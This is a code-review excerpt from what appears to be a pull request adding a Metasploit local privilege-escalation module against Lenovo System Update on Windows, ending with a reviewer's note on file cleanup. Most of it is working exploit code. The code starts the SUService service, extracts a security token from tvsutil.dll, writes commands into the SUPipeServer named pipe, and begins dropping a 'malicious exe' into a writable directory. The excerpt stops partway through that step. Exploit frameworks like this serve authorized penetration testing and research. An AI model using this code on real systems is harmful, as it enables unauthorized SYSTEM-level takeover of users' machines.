modules/exploits/windows/local/lenovo_systemupdate.rb

```diff
@@ -0,0 +1,193 @@
+    end
+
+    svc = service_info('SUService')
+    if svc && svc[:display] =~ /System Update/
+      vprint_good("Found service '#{svc[:display]}'")
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def write_named_pipe(pipe, command)
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      fail_with(Failure::NoTarget, "\\\\.\\pipe\\SUPipeServer named pipe not found")
+    else
+      vprint_good("Opended \\\\.\\pipe\\SUPipeServer! Proceeding...")
+    end
+
+    # First, write the string length as Int32 value
+    w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)
+
+    if w['return'] == false
+      print_error('The was an error writing to pipe, check permissions')
+      return false
+    end
+
+    # Then we send the real command
+    w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)
+
+    if w['return'] == false
+      print_error('The was an error writing to pipe, check permissions')
+      return false
+    end
+
+    true
+  end
+
+
+  def get_security_token(lenovo_directory)
+    if not client.railgun.get_dll('tvsutil') then
+      client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
+      client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
+    end
+
+    dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
+    return dll_response['systeminfo'][0,40]
+  end
+
+
+  def config_service(lenovo_directory, option)
+    cmd_exec(lenovo_directory + "ConfigService.exe #{option}")
+  end
+
+
+  def exploit
+    if is_system?
+      fail_with(Failure::NoTarget, 'Session is already elevated')
+    end
+
+    su_directory = service_info('SUService')[:path][1..-15]
+
+    print_status("Starting service via ConfigService.exe")
+    config_service(su_directory, "start")
+    print_status("Giving the service some time to start...")
+    sleep(datastore['sleep'])
+
+    print_status("Getting security token...")
+    token = get_security_token(su_directory)
+    vprint_good("Security token is: #{token}")
+
+
+    if datastore['WritableDir'] and not datastore['WritableDir'].empty?
+      temp_dir = datastore['WritableDir']
+    else
+      temp_dir = client.sys.config.getenv('TEMP')
+    end
+
+    print_status("Using #{temp_dir} to drop malicious exe")
+
+    begin
+      cd(temp_dir)
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
+    end
+
+    print_status('Writing malicious exe to remote filesystem')
+    write_path = pwd
```

Comment:
Can omit this line and clean the file directly on line 170 if changes is made on line 166 as suggested above:
```ruby
register_file_for_cleanup("#{exe_name}")
```